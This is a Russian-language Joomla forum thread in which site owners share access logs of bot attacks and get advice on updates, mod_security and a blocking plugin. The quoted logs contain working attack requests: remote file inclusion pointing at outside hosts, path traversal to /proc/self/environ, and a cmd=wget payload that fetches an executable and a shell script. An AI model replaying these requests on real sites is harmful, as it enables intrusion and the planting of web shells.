Попытка взлома или я чето непонимаю? - Безопасность сайтов на Joomla

Проверил седня логи ошибок своего сайта и нашол во такие странные строки


Что значат эти строки?
Попытка взлома?
и такое на протяжение двух дней...
Пароли каждый день меняю ото всего и естественно не сохраняю...

joomla 1.5.14
вирт 1.1.3

да, попытка использования известных уязвимостей. Если всё обновлено - то ничего страшного.

P.S> в идеале обновляться до ВМ 1.1.4/J! 1.5.18

Если всё обновлено - то ничего страшного.

ну как сказать
логи доступа и ошибок весят почти гиг в разархивированном виде
и тормозят сайт
-) фу спасибо на днях обновлюсь...
а пока в блек лист их

mod_security для apache может помочь немного

* на свой страх и риск

Глупый вопрос mod_security он что выпоняет?

обрабатывает запросы к серверу и ищет похожие на хацкерские и блокирует их.

а почему на свой страх и риск?

И еще такой вопрос.
Если допустим к папке админ заблокирую все айпи кроме своего спасет хотя бы на время?

а почему на свой страх и риск?

некоторые хорошие запросы он тоже блокирует + phpMyAdmin  блокирует - нужно уметь найти что и какими правилами заблокировало и разрешить их выполнение.

Если допустим к папке админ заблокирую все айпи кроме своего спасет хотя бы на время?

как видно - запрашиваются не только файлы из админки, а ещё и с фронта, так-что в данном случае -нет. НО надо смотреть на сайтах по безопасности какие баги были найдены в каких версиях, и от этого уже плясать (если обновляться не хочется)

Да обновить хочется но делал несколько своих поправок а кот какие и где из памяти вылетело (правда по большей части это вирта качается)

Код

194.20.144.230 - - [07/Jun/2010:02:53:45 +0400] "GET /administrator/index.php HTTP/1.1" 200 4552 "-" "Mozilla/5.0"
194.20.144.230 - - [07/Jun/2010:02:53:46 +0400] "POST /administrator/index.php HTTP/1.1" 200 4913 "-" "Mozilla/5.0"
194.20.144.230 - - [07/Jun/2010:02:53:47 +0400] "GET /administrator/index.php HTTP/1.1" 200 4552 "-" "Mozilla/5.0"
194.20.144.230 - - [07/Jun/2010:02:53:47 +0400] "POST /administrator/index.php HTTP/1.1" 200 4913 "-" "Mozilla/5.0"
194.20.144.230 - - [07/Jun/2010:02:53:48 +0400] "GET /administrator/index.php HTTP/1.1" 200 4552 "-" "Mozilla/5.0"

87.252.2.168 - - [07/Jun/2010:00:03:08 +0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://hytr.interfree.it/id.jpg?? HTTP/1.1" 200 - "-" "libwww-perl/5.813"
87.252.2.168 - - [07/Jun/2010:00:03:11 +0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://hytr.interfree.it/id.jpg?? HTTP/1.1" 200 - "-" "libwww-perl/5.813"

217.66.146.100 - - [07/Jun/2010:00:12:59 +0400] "GET /components/com_virtuemart/fetchscript.php?gzip=1&subdir[0]=/themes/default&file[0]=theme.css&subdir[1]=/js/mootools&file[1]=mooPrompt.css HTTP/1.1" 200 2542 "http://www.site.ru/component/virtuemart/?page=shop.browse&category_id=1662" "HTC_HD2_T8585 Opera/9.7 (Windows NT 5.1; U; ru)"

217.116.47.110 - - [07/Jun/2010:00:17:30 +0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tehstroj.com/modules/mod_poll/ts? HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"

204.152.200.50 - - [07/Jun/2010:00:33:58 +0400] "GET /component/virtuemart/?page=shop.browse&category_id=1808/index.php?option=com_virtuemart&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 31933 "-" "libwww-perl/5.834"
204.152.200.50 - - [07/Jun/2010:00:34:05 +0400] "GET /index.php?option=com_virtuemart&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 22231 "-" "libwww-perl/5.834"
204.152.200.50 - - [07/Jun/2010:00:34:10 +0400] "GET /component/virtuemart/index.php?option=com_virtuemart&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 22252 "-" "libwww-perl/5.834"

217.116.47.110 - - [07/Jun/2010:01:33:16 +0400] "GET /component/virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tehstroj.com/modules/mod_poll/ts? HTTP/1.1" 200 4097 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"

194.20.144.230 - - [07/Jun/2010:02:53:41 +0400] "GET /administrator/index.php HTTP/1.1" 200 4552 "-" "Mozilla/5.0"
194.20.144.230 - - [07/Jun/2010:02:53:41 +0400] "POST /administrator/index.php HTTP/1.1" 200 4913 "-" "Mozilla/5.0"

Бут то в свои логи смотрю,у меня точно тако в логах
Интересно,что потом сделал,как обезопасил сайт

да, попытка использования известных уязвимостей. Если всё обновлено - то ничего страшного.

Подскажите мне пожалуйста

Вчера окрыл логи и вот что я там нашел

Хотелось бы узнать,что это значит,уже сломали сайт или это были попытки?
И раньше были такие записи,но только на Virtuemart но как у меня Virtuemart не стоит я особо непредавл этому значение,то есть стоял Virtuemart но я его давно удалил,правда таблицы в БД остались я их не удалил так как пригодятся
А вчера уже появились записи на другие компоненты котороые я указал ниже,а так как я совсем не разбираюсь в логах,решил написать на форуме надеюсь что помогут

К стати компонент g2bridge у меня его нет и никогда не стоял
Ребята помогите,а то паникую,раз уже ламали сайт,столько сил и нервов затрачено на сайт,просто жалко что кто то его сломает

206.123.118.148 - - [15/Jul/2010:00:40:16 +0600] "GET /sitemap.xml////index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 571 "-" "libwww-perl/5.810"

85.214.118.239 - - [15/Jul/2010:00:54:49 +0600] "GET /sitemap.xml//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.prigorje-info.com/includes/id.txt HTTP/1.1" 404 573 "-" "libwww-perl/5.808"

64.15.156.75 - - [15/Jul/2010:09:42:20 +0600] "GET /sitemap.xml//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://eshop.x25.pl/vir/ID-RFI.txt?? HTTP/1.1" 404 610 "-" "libwww-perl/5.810"


146.83.237.120 - - [16/Jul/2010:03:47:01 +0600] "GET /index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 57155 "-" "libwww-perl/5.79"

Объясню ситуацию... Сейчас, по ходу, в сети работает группа ботов которые ищут уязвимости сайтов и каким то образом потом их используют... У меня постоянно пытаются использовать уязвимости ninja RSS, подгружают шелл. Забанить не получиться по IP, у меня была атака с серверов IANA даже .

Вариант один, обновляться и контролировать появление новых лишних файлов файлов.

Кстати, большей частью они пытаются подгрузить шелл.

19-06-2010 19:14:51 67.228.62.66 Username : No user Serverhost: www.aqaus.com Http_referer : Unkown Request_Uri : /component/option,com_ninjarsssyndicator/feed_id,1/format,raw/lang,en/?option=com_ninjarsssyndicator&controller=http://kangnung.org/zb/casper/Ckrid1.txt??

19-06-2010 19:14:51 67.228.62.66 Username : No user Serverhost: www.aqaus.com Http_referer : Unkown Request_Uri : /component/option,com_ninjarsssyndicator/?option=com_ninjarsssyndicator&controller=http://kangnung.org/zb/casper/Ckrid1.txt??

19-06-2010 19:14:51 67.228.62.66 Username : No user Serverhost: www.aqaus.com Http_referer : Unkown Request_Uri : /component/option,com_ninjarsssyndicator/feed_id,1/?option=com_ninjarsssyndicator&controller=http://kangnung.org/zb/casper/Ckrid1.txt??

или

14-07-2010 5:14:27 201.11.70.113 Username : No user Serverhost: aqaus.com Http_referer : Unkown Request_Uri : /component/option,com_ninjarsssyndicator/feed_id,4/format,raw/lang,ru/*.index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=wget%20-O%20index.exe%20http://www.pricecuter.com/index.exe;wget%20-O%20index.php%20http://www.pricecuter.com/a.txt

Они еще и сканят на компоненты по их признакам. У меня пытались phpbb найти.

Объясню ситуацию... Сейчас, по ходу, в сети работает группа ботов которые ищут уязвимости сайтов и каким то образом потом их используют

Хотелось бы узнать если млжно,судя по записям в логах те что я  опубликовал выше,как ты думаешь сайт тоже пробивал бот или это уже была канкретная атака и сайт ламанули,а?

А теперь вот еще и это,не знаю что делать

9.180.31.11 - - [17/Jul/2010:20:43:12 +0600] "GET /index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22 HTTP/1.1" 200 12564 "-" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:15 +0600] "GET /components/com_community/assets/window.css HTTP/1.1" 200 2225 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:15 +0600] "GET /components/com_community/assets/autocomplete.css HTTP/1.1" 200 719 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:15 +0600] "GET /components/com_community/templates/default/css/style.css HTTP/1.1" 200 15607 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:15 +0600] "GET /components/com_community/assets/jquery-1.3.2.pack.js HTTP/1.1" 200 20144 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:16 +0600] "GET /components/com_community/assets/window-1.0.js HTTP/1.1" 200 2913 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:16 +0600] "GET /components/com_community/assets/script-1.2.js HTTP/1.1" 200 18002 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /components/com_community/templates/default/images/join-button-big-empty.gif HTTP/1.1" 200 2705 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/avatar/groups/thumb_21226cd6fa139c9abd39a1e5.jpg HTTP/1.1" 200 2061 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/119/23/thumb_29ee72a10de9a43ba9b81b73.jpg HTTP/1.1" 200 1927 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/92/14/thumb_102bdfd86e9fae57059c5399.jpg HTTP/1.1" 200 2112 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/125/25/thumb_c577856ef032bdf1f52c12f1.jpg HTTP/1.1" 200 2524 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/92/14/thumb_740a19d54cf822980e7758b3.jpg HTTP/1.1" 200 1710 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/125/25/thumb_7b1c12b0d8d9034ea7096734.jpg HTTP/1.1" 200 1474 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /components/com_community/templates/default/images/app-box-header.png HTTP/1.1" 200 833 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /components/com_community/templates/default/images/greybox-separator.gif HTTP/1.1" 200 1505 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/avatar/groups/thumb_56c25c62c9b2b00fd3e5b4d8.jpg HTTP/1.1" 200 2212 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/jomvideo/videos/91/thumbs/YUAdIAzssiZ.jpg HTTP/1.1" 200 3715 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/avatar/thumb_5c8ca0988992bf63b539b26e.jpg HTTP/1.1" 200 2400 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/119/23/thumb_88373b89d6d1da3e65453d52.jpg HTTP/1.1" 200 2113 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/94/17/thumb_dfc6ea52dbb57920f6a1f3cf.jpg HTTP/1.1" 200 2166 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /components/com_community/templates/default/images/greybox.gif HTTP/1.1" 200 409 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/125/25/thumb_7d58dabac24b458683300ca9.jpg HTTP/1.1" 200 1803 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /components/com_community/templates/default/images/add-button.gif HTTP/1.1" 200 1074 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/119/23/thumb_ea89af6b147c4aa44bb83513.jpg HTTP/1.1" 200 2079 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /components/com_community/templates/default/images/searchbox.png HTTP/1.1" 200 1542 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/avatar/groups/ab0e92b593428ca20af9e75a.jpg HTTP/1.1" 200 5123 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /components/com_community/assets/video_thumb.png HTTP/1.1" 200 2219 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:17 +0600] "GET /images/photos/121/24/thumb_d1c0b6d8f6a89c80c42a4220.jpg HTTP/1.1" 200 5599 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/117/20/thumb_0fa9893444752aec39c098dc.jpg HTTP/1.1" 200 2162 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /components/com_community/templates/default/images/app-box-menu-icon.png HTTP/1.1" 200 4545 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/avatar/groups/thumb_e25305fe85336aed9245ae44.jpg HTTP/1.1" 200 2543 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /components/com_community/assets/group_thumb.jpg HTTP/1.1" 200 4966 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/jomvideo/videos/92/thumbs/mJ0bzCHK80W.jpg HTTP/1.1" 200 2813 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/119/26/thumb_c0a5fa90c310968b3edbc1a5.jpg HTTP/1.1" 200 2564 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/125/25/thumb_5d6282053f314eb0ca43d17e.jpg HTTP/1.1" 200 2373 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/117/20/thumb_15e642977b4284320ade1ce4.jpg HTTP/1.1" 200 1889 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/125/25/thumb_eb080847f3824aea6eb01380.jpg HTTP/1.1" 200 1963 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/117/20/thumb_7e06e1315ec455481d1ebcf6.jpg HTTP/1.1" 200 2020 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/119/23/thumb_1a72b7c8ca7df26dd277f9c8.jpg HTTP/1.1" 200 1827 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:18 +0600] "GET /images/photos/92/14/thumb_eddf815f4fc8e803ee5213b4.png HTTP/1.1" 200 20748 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:19 +0600] "GET /images/photos/117/20/thumb_9d6a2bf67e4468ae0cc7eae0.jpg HTTP/1.1" 200 2651 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:19 +0600] "GET /images/photos/117/20/thumb_8dcba59a63f4ecce4c6b7c8a.jpg HTTP/1.1" 200 2306 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:19 +0600] "GET /components/com_community/assets/favicon/default.png HTTP/1.1" 200 1019 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"
79.180.31.11 - - [17/Jul/2010:20:43:19 +0600] "GET /images/jomvideo/videos/91/thumbs/AtVx5qIscwI.jpg HTTP/1.1" 200 3715 "http://lektor.co.il/index.php?option=com_community&Controller=../../../../../../../../../../../../../../../proc/self/environ%00%20HTTP/1.1%22%20200%2057155%20%22-%22%20%22libwww-perl/5.79%22" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1"

Надо GuardXT пользоваться. Дает возможность наблюдать за изменениями файлов Joomla. Обновить все. В принципе это уже и есть на правленые атаки, хоть и ботом.

Надо GuardXT пользоваться. Дает возможность наблюдать за изменениями файлов Joomla. Обновить все. В принципе это уже и есть на правленые атаки, хоть и ботом.

Спасибо
Хотелось бы узнать если можно,на файл .htaccess какие права должны стоять,я поставил 444 может нельзя,может на .htaccess должно быть 755
Хочу уменшить доступ книму по максимому

Тут я для вас плагинчик нарыл... на себе проверил, пару дибильных запросов он перенаправил в 500 ошибку. Если не будет глюков,должно помочь. Если будут глюки -удалите.

http://extensions.joomla.org/extensions/access-a-security/site-security/12731

Тут я для вас плагинчик нарыл... на себе проверил, пару дибильных запросов он перенаправил в 500 ошибку. Если не будет глюков,должно помочь. Если будут глюки -удалите.

http://extensions.joomla.org/extensions/access-a-security/site-security/12731

Ну спасибо,честно признаюсь не расчитывал на такую отзывчивость
За плагин спасибо,перевел описание через Google транслате,как понял это то что мне нужно,щас попробую,главное чтоб не запороть сайт
Плагин нужно настраивать или просто опубликовать и всея установил этот плагин,открыл а там еще есть куча настроек?

Хотелось бы поинтересоватс,я поставил на файл .htaccess права 444,может это неправильно,может от этого пропадет работоспособность файла,то есть он ваще перестанет работать,может поставить 755 как и было?

По идее на .htaccess права 644. Автор плагина предупреждал, что он может некорректно работать с некоторыми расширениям. Ставим только для теста. Там по моему около 4 правил, я себе самые жесткие поставил. Пока что проблем нет.

По идее на .htaccess права 644. Автор плагина предупреждал, что он может некорректно работать с некоторыми расширениям. Ставим только для теста. Там по моему около 4 правил, я себе самые жесткие поставил. Пока что проблем нет.

Спасибо
Извиняюсь за глупый вопрос,а самые жесткие этот как,я себе тоже так поставлю
Необесутьте что задаю такие вопросы,я не селен в эитх делах,потому такие воспросы и вазникают
Заранее благодорю

З.Ы Судя по тому что написано об том плагине,то он не плох,даже хорош если он может делать все что там написано
А здесь на форуме не обсуждался этот плагин,может есче кто потестит его,интересно было узнать еще мнение людей?

Емайл в черную область впишите... Хотя предупреждение мне так и не пришло.

Емайл в черную область впишите... Хотя предупреждение мне так и не пришло.

Ну что сказать кроме очередного спасибо
Установил плагин,выставил жесткие правила,потсотрем придет ли письмо

Емайл в черную область впишите... Хотя предупреждение мне так и не пришло.

Как вы думаете,этот плагин и нормальные запросы не будет блокировать,например боты поисковиков или еще что,я как понял в плагине установлено если в запросе будет больше двух слешов то этот запрос блокируется,или я наверно чепуху пишу?
Заранее благодорю

У меня ничего лишнего не заблокировал. Все пока что работает... И еще один плюс, боты натыкаясь на ошибку 500 походу больше не лезут. Ни одного хакбота в логах. Похоже они "умные" и получая нестандартный ответ от компонента, убирают его из базы "на взлом" на данном сайте. Пока что по другому объяснить не могу. Может ошибаюсь.

У меня ничего лишнего не заблокировал. Все пока что работает... И еще один плюс, боты натыкаясь на ошибку 500 походу больше не лезут. Ни одного хакбота в логах. Похоже они "умные" и получая нестандартный ответ от компонента, убирают его из базы "на взлом" на данном сайте. Пока что по другому объяснить не могу. Может ошибаюсь.

Ясно,ну что посмотрим что с этого выйдет,интересно как можно было бы проверить этот плагин в работе самому,узнать точно что в действительности защищает сайт,по пробовать сделать какй небудь хакерский запрос и посмотреть как отреагирует плагин,а то на почту не приходит ничего
А вы хоть как то проверяли этот плагин?

Повторил запрос хакера, вместо ошибки компонента получил 500 ошибку.

Повторил запрос хакера, вместо ошибки компонента получил 500 ошибку.

